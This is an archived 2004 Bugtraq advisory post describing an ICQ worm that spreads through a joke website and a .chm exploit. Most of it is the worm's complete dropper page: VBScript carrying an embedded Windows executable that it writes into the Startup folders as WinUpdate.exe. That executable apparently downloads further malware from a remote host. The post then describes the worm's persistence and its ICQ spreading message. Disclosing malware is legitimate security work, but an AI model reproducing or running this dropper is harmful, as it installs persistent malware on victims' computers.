Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

New ICQ WORM

From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Tue, 24 Feb 2004 17:55:16 +0200
The new ICQ WORM...spreading by 2 exploits on
http://www.jokeworld.biz/index.html
and uses icq to download a .chm file that uses the latest .chm exploit.
The chm file is downloaded as ab icq sound wav file, to icq sounds
directory.
the file iefucker.html from inside the .chm file is ran.

iefucker.html
--------------------------CUT HERE------------------------------

<body><html>

<script language="vbs">



 jelmersArray=
array(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,0,0,0,14,31
,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114
,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,7
9,83,32,109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,105,164,7,157,45,197,10
5,206,45,197,105,206,45,197,105,206,71,217,107,206,60,197,105,206,45,197,105
,206,32,197,105,206,215,230,112,206,42,197,105,206,45,197,104,206,56,197,105
,206,215,225,116,206,44,197,105,206,215,225,84,206,44,197,105,206,82,105,99,
104,45,197,105,206,0,0,0,0,0,0,0,0,80,69,0,0,76,1,3,0,192,18,44,64,0,0,0,0,0
,0,0,0,224,0,15,1,11,1,7,0,0,6,0,0,0,8,0,0,0,0,0,0,192,18,0,0,0,16,0,0,0,32,
0,0,0,0,64,0,0,16,0,0,0,2,0,0,4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,64,0,0,0,4,0
,0,0,0,0,0,2,0,0,0,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16,0,0,0,0,0,
0,0,0,0,0,0,20,33,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,160,32,0,0,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,152,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,204,4,0,0,0,16,0
,0,0,6,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,96,46,114,100,97,116,97,0,
0,141,4,0,0,0,32,0,0,0,6,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,64,46,1
00,97,116,97,0,0,0,68,1,0,0,0,48,0,0,0,2,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,64,0,0,192,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,85,
139,236,184,16,21,0,0,232,131,2,0,0,139,69,16,83,86,87,141,80,1,51,219,138,8
,64,58,203,117,249,43,194,131,248,1,15,134,238,1,0,0,106,100,255,21,0,32,64,
0,255,117,16,255,21,4,32,64,0,104,0,1,0,0,141,133,240,251,255,255,80,83,255,
21,56,32,64,0,83,83,106,3,83,106,1,104,0,0,0,128,141,133,240,251,255,255,80,
255,21,60,32,64,0,139,61,16,32,64,0,106,2,83,106,255,80,137,69,16,255,215,13
9,53,20,32,64,0,83,141,69,244,80,106,1,141,69,255,80,255,117,16,255,214,128,
125,255,42,15,133,131,0,0,0,106,2,83,106,251,255,117,16,255,215,83,141,69,24
4,80,106,4,141,69,248,80,255,117,16,255,214,106,2,83,106,251,88,43,69,248,80
,255,117,16,255,215,51,192,83,185,0,4,0,0,141,189,240,234,255,255,243,171,14
1,69,244,80,255,117,248,141,133,240,234,255,255,80,255,117,16,255,214,139,12
5,248,51,246,59,251,118,19,141,132,53,240,234,255,255,128,201,255,42,8,70,59
,247,136,8,114,237,136,156,61,240,234,255,255,51,192,138,140,5,240,234,255,2
55,136,136,32,48,64,0,64,58,203,117,238,255,117,16,255,21,24,32,64,0,190,0,0
,128,0,104,232,3,0,0,255,21,0,32,64,0,83,83,83,83,104,248,32,64,0,255,21,132
,32,64,0,83,83,83,83,104,32,48,64,0,80,163,36,49,64,0,255,21,136,32,64,0,59,
195,163,32,49,64,0,116,200,104,0,1,0,0,141,133,240,254,255,255,80,104,224,32
,64,0,255,21,28,32,64,0,83,104,128,0,0,0,106,2,83,83,104,0,0,0,64,141,133,24
0,254,255,255,80,255,21,60,32,64,0,131,248,255,137,69,16,116,141,83,86,83,25
5,21,32,32,64,0,86,139,248,106,8,87,255,21,36,32,64,0,141,77,240,81,86,80,25
5,53,32,49,64,0,137,69,248,255,21,140,32,64,0,133,192,15,132,91,255,255,255,
83,141,69,240,80,255,117,240,255,117,248,255,117,16,255,21,40,32,64,0,255,11
7,16,255,21,24,32,64,0,83,141,133,240,254,255,255,80,255,21,44,32,64,0,255,5
3,36,49,64,0,139,53,144,32,64,0,255,214,255,53,32,49,64,0,255,214,87,255,21,
48,32,64,0,235,111,190,0,1,0,0,86,141,133,240,253,255,255,80,83,255,21,56,32
,64,0,139,61,28,32,64,0,86,141,133,240,252,255,255,80,104,204,32,64,0,255,21
5,86,141,133,240,250,255,255,80,104,196,32,64,0,255,215,83,141,133,240,252,2
55,255,80,141,133,240,253,255,255,80,255,21,52,32,64,0,83,141,133,240,250,25
5,255,80,141,133,240,253,255,255,80,141,133,240,252,255,255,80,104,188,32,64
,0,83,255,21,124,32,64,0,95,94,51,192,91,201,194,16,0,81,61,0,16,0,0,141,76,
36,8,114,20,129,233,0,16,0,0,45,0,16,0,0,133,1,61,0,16,0,0,115,236,43,200,13
9,196,133,1,139,225,139,8,139,64,4,80,195,204,85,139,236,106,255,104,8,33,64
,0,104,192,20,64,0,100,161,0,0,0,0,80,100,137,37,0,0,0,0,131,196,152,83,86,8
7,137,101,232,199,69,252,0,0,0,0,106,2,255,21,72,32,64,0,131,196,4,199,5,56,
49,64,0,255,255,255,255,199,5,60,49,64,0,255,255,255,255,255,21,76,32,64,0,1
39,13,52,49,64,0,137,8,255,21,80,32,64,0,139,21,48,49,64,0,137,16,161,84,32,
64,0,139,8,137,13,64,49,64,0,232,118,1,0,0,161,16,48,64,0,133,192,117,14,104
,160,20,64,0,255,21,88,32,64,0,131,196,4,232,42,1,0,0,104,12,48,64,0,104,8,4
8,64,0,232,17,1,0,0,131,196,8,139,21,44,49,64,0,137,85,148,141,69,148,80,139
,13,40,49,64,0,81,141,85,156,82,141,69,144,80,141,77,160,81,255,21,96,32,64,
0,131,196,20,104,4,48,64,0,104,0,48,64,0,232,214,0,0,0,131,196,8,139,21,100,
32,64,0,139,50,137,117,140,128,62,34,15,133,168,0,0,0,70,137,117,140,138,6,1
32,192,116,4,60,34,117,242,128,62,34,117,4,70,137,117,140,138,6,132,192,116,
10,60,32,119,6,70,137,117,140,235,240,199,69,208,0,0,0,0,141,69,164,80,255,2
1,8,32,64,0,246,69,208,1,116,10,139,69,212,37,255,255,0,0,235,5,184,10,0,0,0
,80,86,106,0,106,0,255,21,12,32,64,0,80,232,234,251,255,255,137,69,152,80,25
5,21,104,32,64,0,235,34,139,69,236,139,8,139,9,137,77,136,80,81,232,61,0,0,0
,131,196,8,195,139,101,232,139,85,136,82,255,21,112,32,64,0,131,196,4,199,69
,252,255,255,255,255,139,77,240,100,137,13,0,0,0,0,95,94,91,139,229,93,195,1
28,62,32,15,134,102,255,255,255,70,137,117,140,235,241,144,144,255,37,108,32
,64,0,255,37,92,32,64,0,204,204,204,204,104,0,0,3,0,104,0,0,1,0,232,55,0,0,0
,131,196,8,195,144,144,144,144,144,144,144,144,144,144,144,144,144,51,192,19
5,144,144,144,144,144,144,144,144,144,144,144,144,144,195,144,144,144,144,14
4,144,144,144,144,144,144,144,144,144,144,255,37,116,32,64,0,255,37,68,32,64
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,244,35,0,0,230,35,0,0,16,36,0,0,252,35,0,0,176,35,0,0,164,35,0,0,
150,35,0,0,122,35,0,0,108,35,0,0,96,35,0,0,84,35,0,0,74,35,0,0,60,35,0,0,48,
35,0,0,208,35,0,0,194,35,0,0,0,0,0,0,34,35,0,0,240,34,0,0,226,34,0,0,210,34,
0,0,194,34,0,0,174,34,0,0,162,34,0,0,146,34,0,0,136,34,0,0,128,34,0,0,114,34
,0,0,106,34,0,0,2,35,0,0,0,0,0,0,48,36,0,0,0,0,0,0,78,34,0,0,58,34,0,0,38,34
,0,0,16,34,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,192,18,44,64,0,0,0,0,2,0,0,0,
65,0,0,0,76,36,0,0,76,14,0,0,111,112,101,110,0,0,0,0,37,84,69,77,80,37,92,0,
37,84,69,77,80,37,92,97,108,115,100,102,107,106,46,101,120,101,0,0,37,116,10
1,109,112,37,92,97,112,116,103,101,116,117,112,100,46,101,120,101,0,0,0,0,77
,111,122,105,108,108,97,47,53,46,48,0,0,0,0,0,255,255,255,255,34,20,64,0,55,
20,64,0,252,33,0,0,0,0,0,0,0,0,0,0,94,34,0,0,132,32,0,0,188,33,0,0,0,0,0,0,0
,0,0,0,22,35,0,0,68,32,0,0,120,33,0,0,0,0,0,0,0,0,0,0,34,36,0,0,0,32,0,0,244
,33,0,0,0,0,0,0,0,0,0,0,64,36,0,0,124,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,244,35,0,0,230,35,0,0,16,36,0,0,252,35,0,0,176,35,0,0,164,35,0,0,15
0,35,0,0,122,35,0,0,108,35,0,0,96,35,0,0,84,35,0,0,74,35,0,0,60,35,0,0,48,35
,0,0,208,35,0,0,194,35,0,0,0,0,0,0,34,35,0,0,240,34,0,0,226,34,0,0,210,34,0,
0,194,34,0,0,174,34,0,0,162,34,0,0,146,34,0,0,136,34,0,0,128,34,0,0,114,34,0
,0,106,34,0,0,2,35,0,0,0,0,0,0,48,36,0,0,0,0,0,0,78,34,0,0,58,34,0,0,38,34,0
,0,16,34,0,0,0,0,0,0,105,0,73,110,116,101,114,110,101,116,67,108,111,115,101
,72,97,110,100,108,101,0,154,0,73,110,116,101,114,110,101,116,82,101,97,100,
70,105,108,101,0,0,147,0,73,110,116,101,114,110,101,116,79,112,101,110,85,11
4,108,65,0,0,146,0,73,110,116,101,114,110,101,116,79,112,101,110,65,0,87,73,
78,73,78,69,84,46,100,108,108,0,208,0,95,101,120,105,116,0,72,0,95,88,99,112
,116,70,105,108,116,101,114,0,70,2,101,120,105,116,0,0,141,0,95,97,99,109,10
0,108,110,0,88,0,95,95,103,101,116,109,97,105,110,97,114,103,115,0,12,1,95,1
05,110,105,116,116,101,114,109,0,130,0,95,95,115,101,116,117,115,101,114,109
,97,116,104,101,114,114,0,0,155,0,95,97,100,106,117,115,116,95,102,100,105,1
18,0,0,105,0,95,95,112,95,95,99,111,109,109,111,100,101,0,0,110,0,95,95,112,
95,95,102,109,111,100,101,0,0,128,0,95,95,115,101,116,95,97,112,112,95,116,1
21,112,101,0,0,199,0,95,101,120,99,101,112,116,95,104,97,110,100,108,101,114
,51,0,0,77,83,86,67,82,84,46,100,108,108,0,0,180,0,95,99,111,110,116,114,111
,108,102,112,0,0,58,0,67,111,112,121,70,105,108,101,65,0,243,1,72,101,97,112
,68,101,115,116,114,111,121,0,106,3,87,105,110,69,120,101,99,0,118,3,87,114,
105,116,101,70,105,108,101,0,239,1,72,101,97,112,65,108,108,111,99,0,241,1,7
2,101,97,112,67,114,101,97,116,101,0,0,174,0,69,120,112,97,110,100,69,110,11
8,105,114,111,110,109,101,110,116,83,116,114,105,110,103,115,65,0,44,0,67,10
8,111,115,101,72,97,110,100,108,101,0,144,2,82,101,97,100,70,105,108,101,0,0
,241,2,83,101,116,70,105,108,101,80,111,105,110,116,101,114,0,0,74,0,67,114,
101,97,116,101,70,105,108,101,65,0,101,1,71,101,116,77,111,100,117,108,101,7
0,105,108,101,78,97,109,101,65,0,0,120,0,68,101,108,101,116,101,70,105,108,1
01,65,0,41,3,83,108,101,101,112,0,103,1,71,101,116,77,111,100,117,108,101,72
,97,110,100,108,101,65,0,0,156,1,71,101,116,83,116,97,114,116,117,112,73,110
,102,111,65,0,75,69,82,78,69,76,51,50,46,100,108,108,0,0,152,0,83,104,101,10
8,108,69,120,101,99,117,116,101,65,0,83,72,69,76,76,51,50,46,100,108,108,0,8
2,83,68,83,236,197,157,118,3,138,225,70,150,140,250,174,110,228,243,252,5,0,
0,0,103,58,92,33,87,111,114,107,92,95,95,67,117,114,114,101,110,116,92,95,10
0,95,101,92,82,101,108,101,97,115,101,92,95,100,95,101,46,112,100,98,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,151,139,139,143,197,208,208,136,136,136,209,138,140,139,141,158
,155,150,145,152,209,150,145,153,144,208,138,143,155,158,139,154,141,209,154
,135,154,37,0,0,0,42)


win2k="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
win2ok="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
winxp="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
winxpee="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
win98="c:\windows\Start Menu\Programs\Startup\WinUpdate.exe"
win98ate="c:\windows\Start Menu\Programs\Startup\WinUpdate.exe"

Function toString(payloadArray)
For Each arrayElement In payloadArray
toString = toString & ChrB(arrayElement)
Next
End Function
Const adTypeBinary = 1
Const adTypeText = 2
Const adSaveCreateOverWrite = 2

set jelmer = CreateObject("Adodb.Stream")
jelmer.Type = adTypeText
jelmer.Open
jelmer.WriteText toString(jelmersArray)
jelmer.Position = 0
jelmer.Type = adTypeBinary
jelmer.Position = 2
bytearray = jelmer.Read
jelmer.Close

set malware = CreateObject("Adodb.Stream")
malware.Type = adTypeBinary
malware.Open
malware.Write bytearray
On Error Resume Next
malware.savetofile(win2k), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win2ok), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(winxp), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(winxpee), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win98), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win9ate), adSaveCreateOverWrite
On Error Resume Next
malware.Close

</script>

</body></html>
--------------------------CUT HERE------------------------------

and then it writes
c:\documents and settings\all users\start menu\startup\winupdate.exe
c:\windows\start menu\startup\winupdate.exe
c:\windows\all users\start menu\startup\winupdate.exe

the next time the computer starts it will be loaded and will download
another to virus this locations

c:\documents and settings\<your user name>\local settings\temp\alsdfkj.exe
c:\documents and settings\<your user name>\local settings\temp\aptgetupd.exe

this files will create a "sysmon" folder inside the windows\system32
directory.

and this file
c:\windows\system32\sysmon\sysmon.exe
runs in the background and closing regedit if you want to deny it from
autoruning.

the worm uses ICQ to spread sending the following message to all the contact
list:
http://www.jokeworld.biz :) LOL

* This worm possibly opens a shell , hacking was reported on infected
machine
   This worm is raging at Israel this days.

Panda info team was notified.
Rafel Ivgi, The-Insider.
Thanks a lot to "the pull".
Previous By Date Next
Previous By Thread Next

Current thread: